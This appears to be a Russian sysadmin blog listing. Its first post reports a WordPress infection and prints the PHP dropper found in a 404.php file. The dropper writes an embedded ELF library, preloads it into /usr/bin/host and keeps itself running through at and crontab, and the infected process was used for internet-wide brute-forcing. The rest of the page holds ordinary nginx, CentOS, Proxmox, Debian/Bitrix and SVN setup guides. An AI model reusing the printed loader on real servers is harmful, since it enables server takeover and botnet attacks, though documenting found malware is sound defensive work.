0

Коллекция комманд для чистки Wordpess от вирусов

Поймал гадость которая через вордпресс пробралась на сервер и интегрировалась впроцесс /usr/bin/host – запустив его из под пользователя www-data брутфорсила по всему интернету.

Нашел я эту гадость в файле /сайт/wp-includes/images/wlw/404.php .sd0 index.html

@touch(«index.html»); header(«Content-type: text/plain»); print «2842123700\n»; if (! function_exists(‘file_put_contents’)) { function file_put_contents($filename, $data) { $f = @fopen($filename, ‘w’); if (! $f) return false; $bytes = fwrite($f, $data); fclose($f); return $bytes; } } @system(«killall -9 «.basename(«/usr/bin/host»)); $so32 = «\x7f\x45\x4c —— бинарник большой —- x00»; $so64 = «\x7f\x45\x4c —— бинарник большой —- \x00\x00\x00»; $arch = 64; if (intval(«9223372036854775807») == 2147483647) $arch = 32; $so = $arch == 32 ? $so32 : $so64; $f = fopen(«/usr/bin/host», «rb»); if ($f) { $n = unpack(«C*», fread($f, 8)); $so[7] = sprintf(«%c», $n[8]); fclose($f); } $n = file_put_contents(«./libworker.so», $so); $AU=@$_SERVER[«SERVER_NAME»].$_SERVER[«REQUEST_URI»]; $HBN=basename(«/usr/bin/host»); $SCP=getcwd(); @file_put_contents(«1.sh», «#!/bin/sh\ncd ‘».$SCP.»‘\nif [ -f ‘./libworker.so’ ];then killall -9 $HBN;export AU='».$AU.»‘\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v ‘1\.sh’|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n»); @chmod(«1.sh», 0777); @system(«at now -f 1.sh», $ret); if ($ret == 0) { for ($i = 0; $i < 5; $i++) { if (! @file_exists(«1.sh»)) { print «AT success\n»; exit(0); } sleep(1); } } @system(«(crontab -l|grep -v crontab;echo;echo ‘* * * * * «.$SCP.»/1.sh’)|crontab», $ret); if ($ret == 0) { for ($i = 0; $i < 62; $i++) { if (! @file_exists(«1.sh»)) { print «CRONTAB success\n»; exit(0); } sleep(1); } } @system(«./1.sh»); @unlink(«1.sh»);

 

Continue Reading

0

Конфиг Nginx для закрытия сайта по тех причинам

Думаю все интуитивно понятно – закрываем сайт от всех кроме себя, чиним, открывам снова.

Не забудьте сделать красивую заставку и положить ее в корень сайта с именем 503.html.

# by rework.ws

server {
    listen 80;
    server_name www.site.ru;
    set $root_path  /var/www/ru_site;

    error_page 503 /503.html;
  
    location =/503.html {  
          root $root_path;
    }

location / {
    set $allow false;
    if ($http_x_forwarded_for ~ " ?111\.111\.111\.111$") {
    set $allow true;
      }
    if ($allow = false) {
    return 503;
      }

        root $root_path;
        proxy_set_header        Host      $host;
        proxy_set_header        X-Real-IP $remote_addr;
        proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_pass http://127.0.0.1:8080;
        proxy_redirect off;
    }

    location ~ /\.ht { deny  all; }
    location ~ /\.svn { deny  all; }

}
0

Настройка самого быстрого зеркала Centos

Данный плагин предназначен для тестирования скорости до каждого зеркала с последующей сортировкой для использования в YUM. Он устанавливает соединение с каждым зеркалом, время соединения и затем сортирует на быстрые к медленным.

Если используется конфигурация по умолчанию, а так же если вы находитесь не за прокси сервером, то fastestmirror настоятельно рекомендуется (в CentOS 5.3 он установлен по умолчанию).

Чтобы воспользоваться данным плагином, вы должны включить использование плагинов в файле /etc/yum.conf, см. Yum плагины для деталей. Начиная с CentOS 5, плагины включены по умолчанию.

Вы можете установить fastestmirror плагин, используя следующую команду:

yum install yum-plugin-fastestmirror

Или с помощью следующей команды на CentOS 5:

yum install yum-fastestmirror 

После установки fastestmirror, убедитесь, что он включен. Отредактируйте файл /etc/yum/pluginconf.d/fastestmirror.conf и убедитесь, что он содержит следующие строки:

[main]
verbose = 0
socket_timeout = 3
enabled = 1
hostfilepath = /var/cache/yum/timedhosts.txt
maxhostfileage = 1

Чтобы исключить конкретное зеркало, TLD (домен верхнего уровня), или что-то между ними, добавте строку ‘exclude=‘ в /etc/yum/pluginconf.d/fastestmirror.conf:

[main]
...
exclude=.gov, facebook, myspace, junk-mirror.com

С protectbase и fastestmirror плагинами YUM вы получите быстрые обновления с максимальной защитой от случайного повреждения от сторонних репозиториев.

 

Взято от сюда: http://centos.name/?page/howto/FastestMirror/

0

Install a CentOS 6.x Appliance Template in Proxmox

It’s quite easy to install a CentOS 6.0 appliance (template).

  1. Download the precreated template from the OpenVZ site (http://wiki.openvz.org/Download/template/precreated/ ) and store it in the folder /var/lib/vz/template/cache/ of your Proxmox hostnode
  2. Rename the template to <OS>-<OSVERSION>-<NAME>_<VERSION>_<ARCH>.tar.gz to suit Proxmox’ naming convention.
    E.g. centos-6-x86.tar.gz —> centos-6-standard_6.0_i386.tar.gz
    or centos-6-x86_64.tar.gz —> centos-6-standard_6.0_amd64.tar.gz
  3. In the Proxmox Virtual Environment web administrator goto "Virtual Machines -> Create" and use your new template there

Source: http://forum.proxmox.com/archive/index.php/t-6676.html

4

Настройка Debian 6 + PHP 5.4 + PHP-FPM + MySQL + Bitrix

Ниже приведен алгоритм настройки и конфиги #VPS с Debian 6 32bit, 128Мб оперативной памяти и 128Мб свопа для комфортной работы на нем 1C-Битрикс:Стандарт.

Обновление системы и настройка необходимых репозиториев

[shell] apt-get update && apt-get -y upgrade && apt-get -y install mc htop[/shell]

Подключаем репозитории Dotdeb, для того что бы установить PHP5.4 + PHP-FPM:

  1. Добавьте в файл: /etc/apt/sources.list следующие строки:

[code]
deb http://packages.dotdeb.org squeeze all
deb-src http://packages.dotdeb.org squeeze all
[/code]

  1. Для инсталяции PHP 5.4 на Debian 6.0 “Squeeze” нужно добавить строки:

[code]
deb http://packages.dotdeb.org squeeze-php54 all
deb-src http://packages.dotdeb.org squeeze-php54 all
[/code]

  1. Установите ключи доступа к репозиторию GnuPG key

[shell]wget http://www.dotdeb.org/dotdeb.gpg
cat dotdeb.gpg | sudo apt-key add — [/shell]

  1. Обновите систему:
    [shell] # apt-get update && apt-get -y upgrade [/shell]

Устновка и настройка PHP+NGINX+MYSQL

[shell] apt-get -y install mysql-server-5.5 nginx[/shell]
[shell] apt-get -y install php5-fpm php5-gd php5-curl php5-mcrypt php5-json
php5-apc php5-mysql[/shell]

Подробные настройки PHP Mysql Nginx

0

SVN сервер на Debian c SALS

Краткая инструкция, как установить SVN сервер на Debian с использованием авторизации SALS.

 

[shell]
sudo apt-get install libsasl2-2 libsasl2-modules sasl2-bin
sudo vim /etc/default/saslauthd
# change the row that says START=no to START=yes

cd /svn/root
sudo svnadmin create newrepo
sudo vim newrepo/conf/svnserve.conf
# insert the following
[general]
anon-access = none
auth-access = write
# realmname may not contain special chars (this includes spaces,
dashes and pretty much anything except a through z)
realm = realmname
[sasl]
use-sasl = true
min-encryption = 256
max-encryption = 256
# EOF

sudo vim /usr/lib/sasl2/svn.conf
# this is the basic setup.. alotta settings can be used
pwcheck_method: auxprop
auxprop_plugin: sasldb
# i used /etc/svn_sasldb here
sasldb_path: /path/db_name
mech_list: DIGEST-MD5
# EOF

sudo ln -s /usr/lib/sasl2/svn.conf /usr/lib/sasl2/subversion.conf
# add as many users as you need
sudo saslpasswd2 -f /path/db_name -c -u realmname username
sudo /etc/init.d/svnserve restart

# and ya done!!
[/shell]